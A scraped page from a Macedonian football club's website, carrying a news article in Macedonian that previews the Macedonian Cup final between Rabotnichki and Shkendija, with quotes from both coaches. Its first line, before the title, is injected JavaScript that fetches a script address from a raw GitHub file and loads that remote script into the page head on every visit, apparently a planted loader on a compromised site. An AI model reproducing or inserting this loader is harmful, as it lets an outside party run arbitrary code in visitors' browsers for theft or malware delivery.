;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Франц: Работнички сака петта круна, а трета по ред, во Купот
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Франц: Работнички сака петта круна, а трета по ред, во Купот

Се ближи финалето на Купот на Македонија, а нашиот клуб Работнички и оваа сезона ќе биде дел од големиот меч за трофејот. Денеска во прес – центарот на арената „Филип Втори“ се одржа најавата за претстојниот финален натпревар меѓу Работнички и Шкендија, кој е на програмата в понеделник, од 20 часот.

Со два куп-трофеи во последните две сезони, Работнички сака да стигне и до третиот трофеј во низа, вкупно петти во историјата на клубот.

„Горд сум на моите фудбалери и на нашето седмо финале. Ќе се обидеме да стигнеме до третиот трофеј во Купот во низа, вкупно петти во историјата на клубот. Подготвени сме, максимално мотивирани, иако имавме турбулентен период во зимскиот преоден рок, а и проблеми со повреди во текот на сезоната. Сепак, успеавме да стигнеме до финалето, шанса добија и некои помлади фудбалери, и ја искористија на најдобар можен начин. Сега сме во финалето и сакаме да го одбраниме пехарот. Ја респектираме Шкендија, се работи за квалитетен тим кој со своите игри покажа дека е еден од најдобрите и во шампионатот и во Купот оваа сезона. Ќе решаваат нијанси, а ние се надеваме дека на крајот ќе се радуваме“, изјави шефот на стручниот штаб на Работнички, Томислав Франц.

Тренерот на Шкендија, Бруно Акраповиќ, истакна дека Шкендија ќе се обиде да стигне до првиот пехар во Купот на Македонија.

„Се наоѓаме во добра форма, и ќе дадеме се од себе за да го освоиме трофејот во Купот на Македонија. Ќе биде интересен меч, се надевам дека ќе се игра отворен и допадлив фудбал“, изјави Акраповиќ.

Leave a Reply